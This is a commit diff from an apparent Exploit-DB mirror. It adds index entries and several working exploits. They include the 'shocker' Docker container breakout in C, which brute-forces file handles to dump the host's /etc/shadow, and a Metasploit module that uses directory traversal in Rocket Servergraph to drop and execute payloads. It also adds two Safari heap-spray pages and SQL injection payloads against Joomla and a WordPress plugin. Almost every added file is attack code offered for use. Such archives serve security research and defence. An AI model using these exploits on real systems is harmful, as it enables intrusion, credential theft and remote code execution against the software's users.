bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_20_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-20 04:38:01 +00:00
parent 1e69d1cd2d
commit c6e45583e6
8 changed files with 577 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -30453,4 +30453,10 @@ id,file,description,date,author,platform,type,port
33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/Seamonkey CVE-2010-0167 Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0
33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow Vulnerability",2010-03-25,"Luigi Auriemma",multiple,remote,0
33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0
33804,platforms/windows/remote/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,remote,0
33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0
33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress 'plugins.php' SQL Injection Vulnerability",2008-12-13,MustLive,php,webapps,0

Can't render this file because it is too large.

188
platforms/linux/local/33808.c Executable file
View file

@ -0,0 +1,188 @@
/* shocker: docker PoC VMM-container breakout (C) 2014 Sebastian Krahmer
*
* Demonstrates that any given docker image someone is asking
* you to run in your docker setup can access ANY file on your host,
* e.g. dumping hosts /etc/shadow or other sensitive info, compromising
* security of the host and any other docker VM's on it.
*
* docker using container based VMM: Sebarate pid and net namespace,
* stripped caps and RO bind mounts into container's /. However
* as its only a bind-mount the fs struct from the task is shared
* with the host which allows to open files by file handles
* (open_by_handle_at()). As we thankfully have dac_override and
* dac_read_search we can do this. The handle is usually a 64bit
* string with 32bit inodenumber inside (tested with ext4).
* Inode of / is always 2, so we have a starting point to walk
* the FS path and brute force the remaining 32bit until we find the
* desired file (It's probably easier, depending on the fhandle export
* function used for the FS in question: it could be a parent inode# or
* the inode generation which can be obtained via an ioctl).
* [In practise the remaining 32bit are all 0 :]
*
* tested with docker 0.11 busybox demo image on a 3.11 kernel:
*
* docker run -i busybox sh
*
* seems to run any program inside VMM with UID 0 (some caps stripped); if
* user argument is given, the provided docker image still
* could contain +s binaries, just as demo busybox image does.
*
* PS: You should also seccomp kexec() syscall :)
* PPS: Might affect other container based compartments too
*
* $ cc -Wall -std=c99 -O2 shocker.c -static
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <stdint.h>
struct my_file_handle {
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
};
void die(const char *msg)
{
perror(msg);
exit(errno);
}
void dump_handle(const struct my_file_handle *h)
{
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
h->handle_type);
for (int i = 0; i < h->handle_bytes; ++i) {
fprintf(stderr,"0x%02x", h->f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr,"\n");
if (i < h->handle_bytes - 1)
fprintf(stderr,", ");
}
fprintf(stderr,"};\n");
}
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
}
int main()
{
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
read(0, buf, 1);
// get a FS reference from something mounted in from outside
if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
die("[-] open");
if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);
if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");
memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");
fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
close(fd2); close(fd1);
return 0;
}

348
platforms/multiple/remote/33807.rb Executable file
View file

@ -0,0 +1,348 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Rocket Servergraph Admin Center fileRequestor Remote Code Execution',
'Description' => %q{
This module abuses several directory traversal flaws in Rocket Servergraph Admin
Center for Tivoli Storage Manager. The issues exist in the fileRequestor servlet,
allowing a remote attacker to write arbitrary files and execute commands with
administrative privileges. This module has been tested successfully on Rocket
ServerGraph 1.2 over Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu
12.04 64 bits.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-3914'],
['ZDI', '14-161'],
['ZDI', '14-162'],
['BID', '67779']
],
'Privileged' => true,
'Platform' => %w{ linux unix win },
'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_CMD],
'Payload' =>
{
'Space' => 8192, # it's writing a file, so just a long enough value
'DisableNops' => true
#'BadChars' => (0x80..0xff).to_a.pack("C*") # Doesn't apply
},
'Targets' =>
[
[ 'Linux (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
],
[ 'Linux (CMD Payload)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD
}
],
[ 'Windows / VB Script',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Windows CMD',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 30 2013'))
register_options(
[
Opt::RPORT(8888)
], self.class)
register_advanced_options(
[
OptInt.new('TRAVERSAL_DEPTH', [ true, 'Traversal depth to hit the root folder', 20]),
OptString.new("WINDIR", [ true, 'The Windows Directory name', 'WINDOWS' ]),
OptString.new("TEMP_DIR", [ false, 'A directory where we can write files' ])
], self.class)
end
def check
os = get_os
if os.nil?
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Appears
end
def exploit
os = get_os
if os == 'win' && target.name =~ /Linux/
fail_with(Failure::BadConfig, "#{peer} - Windows system detected, but Linux target selected")
elsif os == 'linux' && target.name =~ /Windows/
fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected")
elsif os.nil?
print_warning("#{peer} - Failed to detect remote operating system, trying anyway...")
end
if target.name =~ /Windows.*VB/
exploit_windows_vbs
elsif target.name =~ /Windows.*CMD/
exploit_windows_cmd
elsif target.name =~ /Linux.*CMD/
exploit_linux_cmd
elsif target.name =~ /Linux.*Native/
exploit_linux_native
end
end
def exploit_windows_vbs
traversal = "\\.." * traversal_depth
payload_base64 = Rex::Text.encode_base64(generate_payload_exe)
temp = temp_dir('win')
decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.vbs"
encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64"
exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe"
print_status("#{peer} - Dropping the encoded payload to filesystem...")
write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64)
vbs = generate_decoder_vbs({
:temp_dir => "C:#{temp}",
:encoded_file_name => encoded_file_name,
:exe_file_name => exe_file_name
})
print_status("#{peer} - Dropping the VBS decoder to filesystem...")
write_file("#{traversal}#{temp}#{decoder_file_name}", vbs)
register_files_for_cleanup("C:#{temp}#{decoder_file_name}")
register_files_for_cleanup("C:#{temp}#{encoded_file_name}")
register_files_for_cleanup("C:#{temp}#{exe_file_name}")
print_status("#{peer} - Executing payload...")
execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}")
end
def exploit_windows_cmd
traversal = "\\.." * traversal_depth
execute("#{traversal}\\#{win_dir}\\System32\\cmd.exe /B /C #{payload.encoded}")
end
def exploit_linux_native
traversal = "/.." * traversal_depth
payload_base64 = Rex::Text.encode_base64(generate_payload_exe)
temp = temp_dir('linux')
encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64"
decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh"
elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf"
print_status("#{peer} - Dropping the encoded payload to filesystem...")
write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64)
decoder = <<-SH
#!/bin/sh
base64 --decode #{temp}#{encoded_file_name} > #{temp}#{elf_file_name}
chmod 777 #{temp}#{elf_file_name}
#{temp}#{elf_file_name}
SH
print_status("#{peer} - Dropping the decoder to filesystem...")
write_file("#{traversal}#{temp}#{decoder_file_name}", decoder)
register_files_for_cleanup("#{temp}#{decoder_file_name}")
register_files_for_cleanup("#{temp}#{encoded_file_name}")
register_files_for_cleanup("#{temp}#{elf_file_name}")
print_status("#{peer} - Giving execution permissions to the decoder...")
execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}")
print_status("#{peer} - Executing decoder and payload...")
execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}")
end
def exploit_linux_cmd
temp = temp_dir('linux')
elf = rand_text_alpha(4 + rand(4))
traversal = "/.." * traversal_depth
print_status("#{peer} - Dropping payload...")
write_file("#{traversal}#{temp}#{elf}", payload.encoded)
register_files_for_cleanup("#{temp}#{elf}")
print_status("#{peer} - Providing execution permissions...")
execute("#{traversal}/bin/chmod 777 #{temp}#{elf}")
print_status("#{peer} - Executing payload...")
execute("#{traversal}#{temp}#{elf}")
end
def generate_decoder_vbs(opts = {})
decoder_path = File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")
f = File.new(decoder_path, "rb")
decoder = f.read(f.stat.size)
f.close
decoder.gsub!(/>>decode_stub/, "")
decoder.gsub!(/^echo /, "")
decoder.gsub!(/ENCODED/, "#{opts[:temp_dir]}#{opts[:encoded_file_name]}")
decoder.gsub!(/DECODED/, "#{opts[:temp_dir]}#{opts[:exe_file_name]}")
decoder
end
def get_os
os = nil
path = ""
hint = rand_text_alpha(3 + rand(4))
res = send_request(20, "writeDataFile", rand_text_alpha(4 + rand(10)), "/#{hint}/#{hint}")
if res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\/#{hint}\/#{hint} \(No such file or directory\)/
path = $1
elsif res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\\#{hint}\\#{hint} \(The system cannot find the path specified\)/
path = $1
end
if path =~ /^\//
os = 'linux'
elsif path =~ /^[a-zA-Z]:\\/
os = 'win'
end
os
end
def temp_dir(os)
temp = ""
case os
when 'linux'
temp = linux_temp_dir
when 'win'
temp = win_temp_dir
end
temp
end
def linux_temp_dir
dir = "/tmp/"
if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty?
dir = datastore['TEMP_DIR']
end
unless dir.start_with?("/")
dir = "/#{dir}"
end
unless dir.end_with?("/")
dir = "#{dir}/"
end
dir
end
def win_temp_dir
dir = "\\#{win_dir}\\Temp\\"
if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty?
dir = datastore['TEMP_DIR']
end
dir.gsub!(/\//, "\\")
dir.gsub!(/^([A-Za-z]:)?/, "")
unless dir.start_with?("\\")
dir = "\\#{dir}"
end
unless dir.end_with?("\\")
dir = "#{dir}\\"
end
dir
end
def win_dir
dir = "WINDOWS"
if datastore['WINDIR']
dir = datastore['WINDIR']
dir.gsub!(/\//, "\\")
dir.gsub!(/[\\]*$/, "")
dir.gsub!(/^([A-Za-z]:)?[\\]*/, "")
end
dir
end
def traversal_depth
depth = 20
if datastore['TRAVERSAL_DEPTH'] && datastore['TRAVERSAL_DEPTH'] > 1
depth = datastore['TRAVERSAL_DEPTH']
end
depth
end
def write_file(file_name, contents)
res = send_request(20, "writeDataFile", Rex::Text.uri_encode(contents), file_name)
unless res && res.code == 200 && res.body.to_s =~ /Data successfully writen to file: /
fail_with(Failure::Unknown, "#{peer} - Failed to write file... aborting")
end
res
end
def execute(command)
res = send_request(1, "run", command)
res
end
def send_request(timeout, command, query, source = rand_text_alpha(rand(4) + 4))
data = "&invoker=#{rand_text_alpha(rand(4) + 4)}"
data << "&title=#{rand_text_alpha(rand(4) + 4)}"
data << "&params=#{rand_text_alpha(rand(4) + 4)}"
data << "&id=#{rand_text_alpha(rand(4) + 4)}"
data << "&cmd=#{command}"
data << "&source=#{source}"
data << "&query=#{query}"
res = send_request_cgi(
{
'uri' => normalize_uri('/', 'SGPAdmin', 'fileRequest'),
'method' => 'POST',
'data' => data
}, timeout)
res
end
end

9
platforms/osx/remote/33810.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38992/info
Apple Safari on iPhone and iPod touch is prone to a remote code-execution vulnerability.
Successful exploits can allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions.
Safari on Apple iPhone and iPod touch 3.1.3 is vulnerable; other versions may also be affected.
<html> <head> <title> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </title> <script language="JavaScript"> var n=unescape("%u9090"); var s=unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); for(var i=0;i<64;i++){ n=n+n; document.write('<script>throw n+s;</scr'+'ipt>'); } </script> </head> <body> <center> <h1> Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center></body> </html>

9
platforms/osx/remote/33811.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38994/info
Apple Safari running on iPhone and iPod touch is prone to a remote code-execution vulnerability.
Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions.
Safari on Apple iPhone and iPod touch 3.1.3 and prior are vulnerable.
<html> <head> <script language="JavaScript" type="Text/Javascript"> var slope = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); var slope2 = unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); var finalslope2 = expand(slope2, 49000000); var finalslope = expand(slope, 21000000); document.write(finalslope2); document.write(finalslope); function expand (slope, size) { var i = Math.ceil(Math.log(size) / Math.LN2), res = slope; do { res += res; } while (0 < --i); return res.slice(0, slope.length * size); } </script> </head> <body> </body> </html> <html><body><center><h1> Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center></body></html>

7
platforms/php/webapps/33812.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39032/info
The 'com_weblinks' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5

9
platforms/php/webapps/33813.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39038/info
Fuctweb CapCC Plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CapCC 1.0 is affected; other versions may also be vulnerable.
<html> <head> <title>CapCC SQL Injection exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-admin/plugins.php?page=capcc-config" method="post"> <input type="hidden" name="CAPCC_MAX_ATTEMPTS" value="5 and benchmark(10000000,benchmark(10000000,md5(now())))"> </form> </body> </html>

0
platforms/windows/remote/33804.pl → platforms/windows/dos/33804.pl
View file